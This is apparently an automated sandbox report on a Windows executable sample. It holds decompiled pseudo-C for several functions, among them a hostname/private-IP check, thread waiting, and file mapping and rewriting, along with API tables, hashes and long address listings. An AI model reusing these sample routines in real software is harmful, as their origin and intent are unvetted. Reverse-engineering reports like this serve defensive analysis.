                                                                                                                                                                                                                                                                                    0x00409aad
                                                                                                                                                                                                                                                                                    0x00409abf
                                                                                                                                                                                                                                                                                    0x00409ac4
                                                                                                                                                                                                                                                                                    0x00409ac7
                                                                                                                                                                                                                                                                                    0x00409ac9
                                                                                                                                                                                                                                                                                    0x00409b0c
                                                                                                                                                                                                                                                                                    0x00409b11
                                                                                                                                                                                                                                                                                    0x00409b17
                                                                                                                                                                                                                                                                                    0x00409b1b
                                                                                                                                                                                                                                                                                    0x00409b2d
                                                                                                                                                                                                                                                                                    0x00409b30
                                                                                                                                                                                                                                                                                    0x00409b36
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409b3b
                                                                                                                                                                                                                                                                                    0x00409b45
                                                                                                                                                                                                                                                                                    0x00409b48
                                                                                                                                                                                                                                                                                    0x00409b27
                                                                                                                                                                                                                                                                                    0x00409b27
                                                                                                                                                                                                                                                                                    0x00409b2a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409b2a
                                                                                                                                                                                                                                                                                    0x00409b4a
                                                                                                                                                                                                                                                                                    0x00409b4f
                                                                                                                                                                                                                                                                                    0x00409b5c
                                                                                                                                                                                                                                                                                    0x00409b5f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409b5f
                                                                                                                                                                                                                                                                                    0x00409b67
                                                                                                                                                                                                                                                                                    0x00409b6c
                                                                                                                                                                                                                                                                                    0x00409b70
                                                                                                                                                                                                                                                                                    0x00409b72
                                                                                                                                                                                                                                                                                    0x00409c48
                                                                                                                                                                                                                                                                                    0x00409c4d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409c4d
                                                                                                                                                                                                                                                                                    0x00409b78
                                                                                                                                                                                                                                                                                    0x00409b7c
                                                                                                                                                                                                                                                                                    0x00409b86
                                                                                                                                                                                                                                                                                    0x00409b88
                                                                                                                                                                                                                                                                                    0x00409b88
                                                                                                                                                                                                                                                                                    0x00409b8e
                                                                                                                                                                                                                                                                                    0x00409b96
                                                                                                                                                                                                                                                                                    0x00409b99
                                                                                                                                                                                                                                                                                    0x00409b9d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409ba3
                                                                                                                                                                                                                                                                                    0x00409ba9
                                                                                                                                                                                                                                                                                    0x00409bb7
                                                                                                                                                                                                                                                                                    0x00409bbe
                                                                                                                                                                                                                                                                                    0x00409bc0
                                                                                                                                                                                                                                                                                    0x00409c17
                                                                                                                                                                                                                                                                                    0x00409c1d
                                                                                                                                                                                                                                                                                    0x00409c20
                                                                                                                                                                                                                                                                                    0x00409c27
                                                                                                                                                                                                                                                                                    0x00409c2d
                                                                                                                                                                                                                                                                                    0x00409c2d
                                                                                                                                                                                                                                                                                    0x00409c30
                                                                                                                                                                                                                                                                                    0x00409c36
                                                                                                                                                                                                                                                                                    0x00409c36
                                                                                                                                                                                                                                                                                    0x00409c3f
                                                                                                                                                                                                                                                                                    0x00409c41
                                                                                                                                                                                                                                                                                    0x00409c43
                                                                                                                                                                                                                                                                                    0x00409c43
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409bc2
                                                                                                                                                                                                                                                                                    0x00409bc2
                                                                                                                                                                                                                                                                                    0x00409bc2
                                                                                                                                                                                                                                                                                    0x00409bce
                                                                                                                                                                                                                                                                                    0x00409bd1
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409bd5
                                                                                                                                                                                                                                                                                    0x00409bd5
                                                                                                                                                                                                                                                                                    0x00409bdd
                                                                                                                                                                                                                                                                                    0x00409bea
                                                                                                                                                                                                                                                                                    0x00409bf0
                                                                                                                                                                                                                                                                                    0x00409bfe
                                                                                                                                                                                                                                                                                    0x00409c06
                                                                                                                                                                                                                                                                                    0x00409c0e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409c0e
                                                                                                                                                                                                                                                                                    0x00409b9d
                                                                                                                                                                                                                                                                                    0x00409add
                                                                                                                                                                                                                                                                                    0x00409ae2
                                                                                                                                                                                                                                                                                    0x00409ae5
                                                                                                                                                                                                                                                                                    0x00409ae7
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409afb
                                                                                                                                                                                                                                                                                    0x00409b00
                                                                                                                                                                                                                                                                                    0x00409b03
                                                                                                                                                                                                                                                                                    0x00409b05
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409b05
                                                                                                                                                                                                                                                                                    0x00409a7e
                                                                                                                                                                                                                                                                                    0x00409a83
                                                                                                                                                                                                                                                                                    0x00409a86
                                                                                                                                                                                                                                                                                    0x00409a88
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409a8f
                                                                                                                                                                                                                                                                                    0x00409a9c
                                                                                                                                                                                                                                                                                    0x00409aa1
                                                                                                                                                                                                                                                                                    0x00409aa4
                                                                                                                                                                                                                                                                                    0x00409aa6
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409aa6
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409770: gethostname.WS2_32(?,00000100), ref: 0040978C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409770: gethostbyname.WS2_32(?), ref: 0040979E
                                                                                                                                                                                                                                                                                    • strstr.NTDLL ref: 00409A60
                                                                                                                                                                                                                                                                                    • strstr.NTDLL ref: 00409A7E
                                                                                                                                                                                                                                                                                    • strstr.NTDLL ref: 00409A9C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: strstr$gethostbynamegethostname
                                                                                                                                                                                                                                                                                    • String ID: .10$.10.$.127$.127.$10.$127.
                                                                                                                                                                                                                                                                                    • API String ID: 2540993189-3303897403
                                                                                                                                                                                                                                                                                    • Opcode ID: 42776ebd3e410ca7c1fc6fe8d2357f856bb71b1c556b321f1289088777c786c6
                                                                                                                                                                                                                                                                                    • Instruction ID: 3df5601b161af7dea13d6a0229968f945e0e067b118b08783a6fcb5bdca65d6d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42776ebd3e410ca7c1fc6fe8d2357f856bb71b1c556b321f1289088777c786c6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC51B4B8E043449BDB04EB61E841BAA7BB5AB44308F04C53EE904673C2D67EE951CB9D
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                                                                                                                                                    			E0040BC90(LONG* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                                                    				LONG* _v16;
                                                                                                                                                                                                                                                                                    				signed char _v17;
                                                                                                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                                                    				signed int _t57;
                                                                                                                                                                                                                                                                                    				intOrPtr _t80;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v8 = GetThreadPriority(GetCurrentThread());
                                                                                                                                                                                                                                                                                    				SetThreadPriority(GetCurrentThread(), 0xfffffffe);
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                    					_v16 = _a4;
                                                                                                                                                                                                                                                                                    					if(InterlockedExchangeAdd(_v16, 0) > 0) {
                                                                                                                                                                                                                                                                                    						_v17 = 0 | _a8 != 0xffffffff;
                                                                                                                                                                                                                                                                                    						while(1 != 0) {
                                                                                                                                                                                                                                                                                    							_v24 = 0;
                                                                                                                                                                                                                                                                                    							EnterCriticalSection( &(_v16[1]));
                                                                                                                                                                                                                                                                                    							_v28 = 0;
                                                                                                                                                                                                                                                                                    							while(_v28 <  *_v16) {
                                                                                                                                                                                                                                                                                    								if( *(_v16[7] + _v28 * 4) != 0) {
                                                                                                                                                                                                                                                                                    									_t57 = WaitForSingleObject( *(_v16[7] + _v28 * 4), 0);
                                                                                                                                                                                                                                                                                    									asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                    									_v24 =  ~_t57 + 1 + _v24;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									_v24 = _v24 + 1;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_v28 = _v28 + 1;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							LeaveCriticalSection( &(_v16[1]));
                                                                                                                                                                                                                                                                                    							if(_v24 !=  *_v16) {
                                                                                                                                                                                                                                                                                    								if((_v17 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    									L15:
                                                                                                                                                                                                                                                                                    									Sleep(1);
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									_t80 = _a8 - 1;
                                                                                                                                                                                                                                                                                    									_a8 = _t80;
                                                                                                                                                                                                                                                                                    									if(_t80 != 0) {
                                                                                                                                                                                                                                                                                    										goto L15;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_v12 = 1;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L16:
                                                                                                                                                                                                                                                                                    				SetThreadPriority(GetCurrentThread(), _v8);
                                                                                                                                                                                                                                                                                    				return _v12;
                                                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                                                    0x0040bca3
                                                                                                                                                                                                                                                                                    0x0040bcaf
                                                                                                                                                                                                                                                                                    0x0040bcb5
                                                                                                                                                                                                                                                                                    0x0040bcc0
                                                                                                                                                                                                                                                                                    0x0040bcc9
                                                                                                                                                                                                                                                                                    0x0040bcda
                                                                                                                                                                                                                                                                                    0x0040bce9
                                                                                                                                                                                                                                                                                    0x0040bcec
                                                                                                                                                                                                                                                                                    0x0040bcf9
                                                                                                                                                                                                                                                                                    0x0040bd07
                                                                                                                                                                                                                                                                                    0x0040bd0d
                                                                                                                                                                                                                                                                                    0x0040bd1f
                                                                                                                                                                                                                                                                                    0x0040bd36
                                                                                                                                                                                                                                                                                    0x0040bd52
                                                                                                                                                                                                                                                                                    0x0040bd5a
                                                                                                                                                                                                                                                                                    0x0040bd62
                                                                                                                                                                                                                                                                                    0x0040bd38
                                                                                                                                                                                                                                                                                    0x0040bd3e
                                                                                                                                                                                                                                                                                    0x0040bd3e
                                                                                                                                                                                                                                                                                    0x0040bd1c
                                                                                                                                                                                                                                                                                    0x0040bd1c
                                                                                                                                                                                                                                                                                    0x0040bd6e
                                                                                                                                                                                                                                                                                    0x0040bd7c
                                                                                                                                                                                                                                                                                    0x0040bd8d
                                                                                                                                                                                                                                                                                    0x0040bd9c
                                                                                                                                                                                                                                                                                    0x0040bd9e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040bd8f
                                                                                                                                                                                                                                                                                    0x0040bd92
                                                                                                                                                                                                                                                                                    0x0040bd95
                                                                                                                                                                                                                                                                                    0x0040bd98
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040bd9a
                                                                                                                                                                                                                                                                                    0x0040bd98
                                                                                                                                                                                                                                                                                    0x0040bd7e
                                                                                                                                                                                                                                                                                    0x0040bd7e
                                                                                                                                                                                                                                                                                    0x0040bd7e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040bd7c
                                                                                                                                                                                                                                                                                    0x0040bcec
                                                                                                                                                                                                                                                                                    0x0040bcda
                                                                                                                                                                                                                                                                                    0x0040bda9
                                                                                                                                                                                                                                                                                    0x0040bdb4
                                                                                                                                                                                                                                                                                    0x0040bdc0

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32(?,0040E1CE,?,000000FF,?,0040EC84), ref: 0040BC96
                                                                                                                                                                                                                                                                                    • GetThreadPriority.KERNEL32(00000000,?,0040E1CE,?,000000FF,?,0040EC84), ref: 0040BC9D
                                                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32(000000FE,?,0040E1CE,?,000000FF,?,0040EC84), ref: 0040BCA8
                                                                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,0040E1CE,?,000000FF,?,0040EC84), ref: 0040BCAF
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(000000FF,00000000), ref: 0040BCD2
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(000000FB), ref: 0040BD07
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040BD52
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040BD6E
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040BD9E
                                                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32(0040EC84,?,0040E1CE,?,000000FF), ref: 0040BDAD
                                                                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,0040E1CE,?,000000FF), ref: 0040BDB4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3862671961-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 9b630854fbef9f049a7081aae18ede4369720886b006fadf81150b85c4d4f177
                                                                                                                                                                                                                                                                                    • Instruction ID: 7471dcba010468c66186aef50ce52d9a71631389d56eaee9496ec156eb60796e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b630854fbef9f049a7081aae18ede4369720886b006fadf81150b85c4d4f177
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7414E74D00209EFDB14CFA4D848BAEBB75FF44305F20C16AE906A7380D7789A81CB99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00409D40() {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                                                                                                    				DWORD* _v28;
                                                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr _t41;
                                                                                                                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				InitializeCriticalSection(0x416df4);
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				while(_v12 < 0x200) {
                                                                                                                                                                                                                                                                                    					E00409A30( *((intOrPtr*)(0x4143b8 + _v12 * 4)), E0040BE60(), 0);
                                                                                                                                                                                                                                                                                    					_t74 = _t74 + 0xc;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v8 = CreateFileW(0x416be8, 0x80000000, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                                    				if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    					_v16 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    						_v20 = MapViewOfFile(_v16, 4, 0, 0, 0);
                                                                                                                                                                                                                                                                                    						if(_v20 != 0) {
                                                                                                                                                                                                                                                                                    							_v24 = GetFileSize(_v8, 0);
                                                                                                                                                                                                                                                                                    							_v28 = 0;
                                                                                                                                                                                                                                                                                    							_v32 = 0;
                                                                                                                                                                                                                                                                                    							while(_v28 < _v24 && _v32 < 0x200) {
                                                                                                                                                                                                                                                                                    								E00409A30( *((intOrPtr*)(_v20 + _v32 * 8)), E0040BE60() -  *((intOrPtr*)(_v20 + 4 + _v32 * 8)), 0);
                                                                                                                                                                                                                                                                                    								_t74 = _t74 + 0xc;
                                                                                                                                                                                                                                                                                    								_v28 =  &(_v28[2]);
                                                                                                                                                                                                                                                                                    								_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							UnmapViewOfFile(_v20);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						CloseHandle(_v16);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					CloseHandle(_v8);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				E00409750();
                                                                                                                                                                                                                                                                                    				_t41 =  *0x416e10; // 0x0
                                                                                                                                                                                                                                                                                    				return E0040BBA0(_t41, 0, E00409620, 0, 0, 0);
                                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                                    0x00409d4b
                                                                                                                                                                                                                                                                                    0x00409d51
                                                                                                                                                                                                                                                                                    0x00409d63
                                                                                                                                                                                                                                                                                    0x00409d7f
                                                                                                                                                                                                                                                                                    0x00409d84
                                                                                                                                                                                                                                                                                    0x00409d60
                                                                                                                                                                                                                                                                                    0x00409d60
                                                                                                                                                                                                                                                                                    0x00409da3
                                                                                                                                                                                                                                                                                    0x00409daa
                                                                                                                                                                                                                                                                                    0x00409dc4
                                                                                                                                                                                                                                                                                    0x00409dcb
                                                                                                                                                                                                                                                                                    0x00409de3
                                                                                                                                                                                                                                                                                    0x00409dea
                                                                                                                                                                                                                                                                                    0x00409df8
                                                                                                                                                                                                                                                                                    0x00409dfb
                                                                                                                                                                                                                                                                                    0x00409e02
                                                                                                                                                                                                                                                                                    0x00409e1d
                                                                                                                                                                                                                                                                                    0x00409e4a
                                                                                                                                                                                                                                                                                    0x00409e4f
                                                                                                                                                                                                                                                                                    0x00409e11
                                                                                                                                                                                                                                                                                    0x00409e1a
                                                                                                                                                                                                                                                                                    0x00409e1a
                                                                                                                                                                                                                                                                                    0x00409e58
                                                                                                                                                                                                                                                                                    0x00409e58
                                                                                                                                                                                                                                                                                    0x00409e62
                                                                                                                                                                                                                                                                                    0x00409e62
                                                                                                                                                                                                                                                                                    0x00409e6c
                                                                                                                                                                                                                                                                                    0x00409e6c
                                                                                                                                                                                                                                                                                    0x00409e72
                                                                                                                                                                                                                                                                                    0x00409e84
                                                                                                                                                                                                                                                                                    0x00409e95

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00416DF4,?,?,?,?,?,?,00406559), ref: 00409D4B
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00416BE8,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00409D9D
                                                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00409DBE
                                                                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00409DDD
                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00409DF2
                                                                                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00409E58
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00409E62
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00409E6C
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BE60: NtQuerySystemTime.NTDLL ref: 0040BE6A
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040BE60: RtlTimeToSecondsSince1980.NTDLL ref: 0040BE78
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                                                                                                                                                                                    • String ID: Ye@
                                                                                                                                                                                                                                                                                    • API String ID: 439099756-4068086367
                                                                                                                                                                                                                                                                                    • Opcode ID: f34f8cfc51801f30e90d44d220303d9a0f78e995387e0b56e3f657b0986bfc59
                                                                                                                                                                                                                                                                                    • Instruction ID: 4dce5e276bdf20b80a38771717a09593e8b4a8e5598cf30a42ed89e5f557a98d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f34f8cfc51801f30e90d44d220303d9a0f78e995387e0b56e3f657b0986bfc59
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4413F74E40308BBDB10DBA4DC4ABAEB774AB44704F208569F611772C2C7B96941CF9D
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                                                                                                    			E0040D1D0(WCHAR* _a4) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				DWORD* _v20;
                                                                                                                                                                                                                                                                                    				char _v21;
                                                                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                                                                                    				DWORD* _t70;
                                                                                                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v21 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_v16 = CreateFileW(_a4, 0x80000000, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                                    				if(_v16 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    						_v16 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                                    						if(_v16 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    							_v21 = 1;
                                                                                                                                                                                                                                                                                    							WriteFile(_v16, _v8, _v12,  &_v12, 0);
                                                                                                                                                                                                                                                                                    							CloseHandle(_v16);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						E00408C70(_v8);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					return _v21;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v28 = CreateFileMappingW(_v16, 0, 2, 0, 0, 0);
                                                                                                                                                                                                                                                                                    				if(_v28 == 0) {
                                                                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                                                                    					CloseHandle(_v16);
                                                                                                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v32 = MapViewOfFile(_v28, 4, 0, 0, 0);
                                                                                                                                                                                                                                                                                    				if(_v32 == 0) {
                                                                                                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                                                                                                    					CloseHandle(_v28);
                                                                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_v12 = GetFileSize(_v16, 0);
                                                                                                                                                                                                                                                                                    					if(_v12 > 0x100) {
                                                                                                                                                                                                                                                                                    						_t70 = E0040B1E0(_v32, _v32);
                                                                                                                                                                                                                                                                                    						_t103 = _t103 + 4;
                                                                                                                                                                                                                                                                                    						_v20 = _t70;
                                                                                                                                                                                                                                                                                    						if(_v20 != 0 && _v20[6] == _v12 - 0x100) {
                                                                                                                                                                                                                                                                                    							_v12 = _v20[6];
                                                                                                                                                                                                                                                                                    							_t73 = E0040AB80(_v32 + 0x100,  &(_v20[2]), 0x10, _v32 + 0x100, _v12);
                                                                                                                                                                                                                                                                                    							_t103 = _t103 + 0x10;
                                                                                                                                                                                                                                                                                    							_v8 = _t73;
                                                                                                                                                                                                                                                                                    							if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    								E004094C0(_v8, _v12,  &_v48);
                                                                                                                                                                                                                                                                                    								_t103 = _t103 + 0xc;
                                                                                                                                                                                                                                                                                    								asm("repe cmpsd");
                                                                                                                                                                                                                                                                                    								if(0 != 0) {
                                                                                                                                                                                                                                                                                    									E00408C70(_v8);
                                                                                                                                                                                                                                                                                    									_t103 = _t103 + 4;
                                                                                                                                                                                                                                                                                    									_v8 = 0;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					UnmapViewOfFile(_v32);
                                                                                                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                                                                    0x0040d1d8
                                                                                                                                                                                                                                                                                    0x0040d1dc
                                                                                                                                                                                                                                                                                    0x0040d1e3
                                                                                                                                                                                                                                                                                    0x0040d1ea
